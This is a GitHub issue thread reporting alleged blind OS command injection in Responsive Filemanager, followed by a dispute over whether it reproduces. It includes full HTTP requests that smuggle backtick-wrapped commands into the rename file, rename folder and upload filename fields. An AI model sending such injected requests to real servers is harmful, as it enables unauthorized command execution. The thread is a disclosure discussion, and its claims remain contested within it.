trippo / ResponsiveFilemanager

Completely Responsive Filemanager with integration for tinyMCE,CKEditor and CLEditor editor
http://responsivefilemanager.com
Other
815 stars 363 forks source link

Multiple blind OS command injections in latest version of Responsive Filemanager #640

Open neumrli opened 4 years ago

neumrli commented 4 years ago

While doing penetration test for a client, I have discovered multiple blind OS command injections in latest version of Responsive Filemanager which resulted in full RCE.

My guess is that str_replace in file utils.php on line 738 is the reason since it does not filter backtick (`) operator which is equal to shell_exec() in PHP, and this is the reason for rename_file and rename_folder since they both use fix_filename function with $name as parameter.

Rename file

In execute.php, when value of URL parameter action is set to rename_file, POST parameter name is exploitable by inserting backticks `` with payload inside them.

Example of vulnerable request from Burp which will send sleep 5:

POST /responsive_filemanager/filemanager/execute.php?action=rename_file HTTP/1.1
Host: test.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 34
Connection: close
Cookie: PHPSESSID=session_id

path=file.png&name=example`sleep 5`

Rename folder

In execute.php, when value of URL parameter action is set to rename_folder, POST parameter name is exploitable by inserting backticks `` with payload inside them.

Example of vulnerable request from Burp which will send sleep 5:

POST /responsive_filemanager/filemanager/execute.php?action=rename_folder HTTP/1.1
Host: test.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Cookie: PHPSESSID=session_id
Connection: close

path=d1&name=d1`sleep 5`

Content-disposition

In upload.php, the value of content-disposition parameter filename is exploitable by creating uploadable file with backticks around OS command. In UploadHandler.php, preg_replace on line 1394 will run preg_replace over uploaded filename which contains backtick which will result in command execution.

POST /responsive_filemanager/filemanager/upload.php HTTP/1.1
Host: test.com
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------129232720120266098121954187103
Content-Length: 12166
Cookie: PHPSESSID=session_id
Connection: close

-----------------------------129232720120266098121954187103
Content-Disposition: form-data; name="fldr"

-----------------------------129232720120266098121954187103
Content-Disposition: form-data; name="files[]"; filename="`sleep 5`"
Content-Type: application/octet-stream

PNG
-----------------------------129232720120266098121954187103--
hackoclipse commented 4 years ago

this is a false positive. yes preg_replace can lead to command injection in php 5.6 and lower, however then the regex has to end with "/e" what isn't the case here. the code would never execute.

neumrli commented 4 years ago

Well, I'm telling you that I have achieved command injection in these three examples above.

On the other hand, I could be wrong about preg_replace as a cause of this injection, it can be something else.

hackoclipse commented 4 years ago

i wasn't able to reproduce it in php 5.6 and php 7.2.

hackoclipse commented 4 years ago

there are also no eval or assert functions in the code so php code can't execute in that way.

neumrli commented 4 years ago

It was PHP 7.4.10 in my case.

hackoclipse commented 4 years ago

now from my testing i can't reproduce a single of the vulns. i tried your origenal payload, created a simular enviorment by requesting the same options and still no luck. and i even copyed the code with the potential vulnberbility, gave it the correct input and still it did nothing. and im preaty certain im doing it correctly because i have been pentesting this applications for a while now ( take a look at the issues's there was also a RCE somewhere else. still not fixed but i did request 3 cve's. )

gister9000 commented 3 years ago

I was right next to @neumrli when he exploited this for a shell. How did the shell appear if this is false positive?